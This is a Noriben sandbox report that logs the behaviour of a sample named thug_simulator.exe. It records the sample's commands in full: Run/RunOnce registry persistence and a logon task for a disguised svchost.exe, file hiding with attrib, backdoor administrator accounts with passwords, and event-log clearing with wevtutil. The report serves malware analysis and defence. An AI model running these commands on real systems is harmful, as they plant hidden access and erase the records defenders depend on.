-=] Sandbox Analysis Report generated by Noriben v2.0.0 -=] https://github.com/Rurik/Noriben -=] Processing time: 2.61 seconds -=] Analysis time: 1.58 seconds Processes Created: ================== [CreateProcess] thug_simulator.exe:1976 > "cmd.exe /c %AllUsersProfile%\asefa.bat" [Child PID: 2128] [CreateProcess] cmd.exe:2128 > "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run " [Child PID: 2904] [CreateProcess] cmd.exe:2128 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /t REG_SZ /d %AllUsersProfile%\SecurityUpdate\svchost.exe /f " [Child PID: 5936] [CreateProcess] cmd.exe:2128 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v SecurityScan /t REG_SZ /d %AllUsersProfile%\SecurityUpdate\svchost.exe /f " [Child PID: 3312] [CreateProcess] cmd.exe:2128 > "schtasks /create /tn WindowsUpdateCheck /tr %AllUsersProfile%\SecurityUpdate\svchost.exe /sc onlogon /rl HIGHEST /f " [Child PID: 4792] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\config.dat " [Child PID: 5956] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\network.dat " [Child PID: 4476] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\dns.dat " [Child PID: 4272] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\connections.dat " [Child PID: 1984] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\accounts.dat " [Child PID: 3464] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\userlist.dat " [Child PID: 5932] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\services.dat " [Child PID: 3904] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\jobs.dat " [Child PID: 4468] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\apps.dat " [Child PID: 1708] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\autorun.dat " [Child PID: 892] [CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\SecurityUpdate " [Child PID: 5756] [CreateProcess] cmd.exe:2128 > "net user Administators Secur1ty@2025 /add " [Child PID: 4244] [CreateProcess] net.exe:4244 > "%WinDir%\system32\net1 user Administators Secur1ty@2025 /add " [Child PID: 6692] [CreateProcess] cmd.exe:2128 > "net localgroup Administrators Administators /add " [Child PID: 5896] [CreateProcess] net.exe:5896 > "%WinDir%\system32\net1 localgroup Administrators Administators /add " [Child PID: 1508] [CreateProcess] cmd.exe:2128 > "net user SYSTEM_SERVICE Svc@Admin#99 /add " [Child PID: 8096] [CreateProcess] net.exe:8096 > "%WinDir%\system32\net1 user SYSTEM_SERVICE Svc@Admin#99 /add " [Child PID: 2440] [CreateProcess] cmd.exe:2128 > "net localgroup Administrators SYSTEM_SERVICE /add " [Child PID: 5296] [CreateProcess] net.exe:5296 > "%WinDir%\system32\net1 localgroup Administrators SYSTEM_SERVICE /add " [Child PID: 6520] [CreateProcess] cmd.exe:2128 > "wevtutil cl System " [Child PID: 7996] [CreateProcess] cmd.exe:2128 > "wevtutil cl Security " [Child PID: 3864] [CreateProcess] cmd.exe:2128 > "wevtutil cl Application " [Child PID: 4716] File Activity: ================== [CreateFolder] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate [CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate\update.log [SHA256: 2e6ba70f0fac26812d9267536181c2ee6676211889f955b356329e140465b4ae] [CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm [SHA256: 7183fbf556628a122f3e51c62034dcc428a79586f1f7eb7c94600968ca2eb66a] [CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm [SHA256: 7183fbf556628a122f3e51c62034dcc428a79586f1f7eb7c94600968ca2eb66a] [CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm:Zone.Identifier [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0] [CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\image_downloader.exe [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910] [CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\image_downloader.exe:Zone.Identifier [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0] [CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\fileview.exe [SHA256: bfb1a374772cccc06440ee3def14d6556d3b51c9e6de95b69917798b235e733b] [CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\fileview.exe:Zone.Identifier [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0] [CreateFile] thug_simulator.exe:1976 > %Public%\Pictures\frontpage.jpg [SHA256: 4e24eaca0183c81d776dbcf5b35afd601f536f127565e20780d71a3bab3e0170] [CreateFile] thug_simulator.exe:1976 > %Public%\Pictures\frontpage.jpg:Zone.Identifier [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0] [CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\asefa.bat [File no longer exists] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\autorun.dat [SHA256: ee0c7791807b985c1b693c1b8a6caa92483c2c2257142f96e05dbb624d0d66d5] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe:Zone.Identifier [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0] [CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910] [CreateFile] attrib.exe:5956 > %AllUsersProfile%\config.dat [SHA256: f8e898e6e020b92542763c35899bb225035bfc22f98d01376020d7cc3b619bc5] [CreateFile] attrib.exe:4476 > %AllUsersProfile%\network.dat [SHA256: d91bbff2766f226886d4b7009f0f750249e84782d479da0b5c9c101938304a36] [CreateFile] attrib.exe:4272 > %AllUsersProfile%\dns.dat [SHA256: 807a39cfa3f849fe8ce6b12ba5791fb4e5b61c0063320dbdcf0f92b86004ac03] [CreateFile] attrib.exe:1984 > %AllUsersProfile%\connections.dat [SHA256: 8580e55c18a2d73067cc03a9a57b65b17b66f76dcd5f16fe089bcc4d9515232c] [CreateFile] attrib.exe:3464 > %AllUsersProfile%\accounts.dat [SHA256: 32a247d809d6ddd363444b2e6afba3319e482fb9e404ac778fdd07178cfd398a] [CreateFile] attrib.exe:5932 > %AllUsersProfile%\userlist.dat [SHA256: 1977cd3ed538bd559208f9ae7dea401dd70b6020173be06cfe1aa7a3a7c62794] [CreateFile] attrib.exe:3904 > %AllUsersProfile%\services.dat [SHA256: d584a1159003e15ce9963d605112d056a6dd15e4106d7594c76c39feaa27ba27] [CreateFile] attrib.exe:4468 > %AllUsersProfile%\jobs.dat [SHA256: 0f3668aa14f800a9fa7fe810fea4ac138cfe4f1de023f41a2bc5bf398ad07b15] [CreateFile] attrib.exe:1708 > %AllUsersProfile%\apps.dat [SHA256: 62ba69ea9e942b5d90f184bd96de216475f0c91b68dfafdecc65b24194db5ccf] [CreateFile] attrib.exe:892 > %AllUsersProfile%\autorun.dat [SHA256: ee0c7791807b985c1b693c1b8a6caa92483c2c2257142f96e05dbb624d0d66d5] [CreateFolder] attrib.exe:5756 > %AllUsersProfile%\SecurityUpdate [CreateFile] cmd.exe:2128 > %AllUsersProfile%\asefa.bat [File no longer exists] [CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate\update.log [SHA256: 2e6ba70f0fac26812d9267536181c2ee6676211889f955b356329e140465b4ae] Registry Activity: ================== [RegSetValue] reg.exe:5936 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = C:\ProgramData\SecurityUpdate\svchost.exe [RegSetValue] reg.exe:3312 > HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\SecurityScan = C:\ProgramData\SecurityUpdate\svchost.exe Network Traffic: ================== Unique Hosts: ==================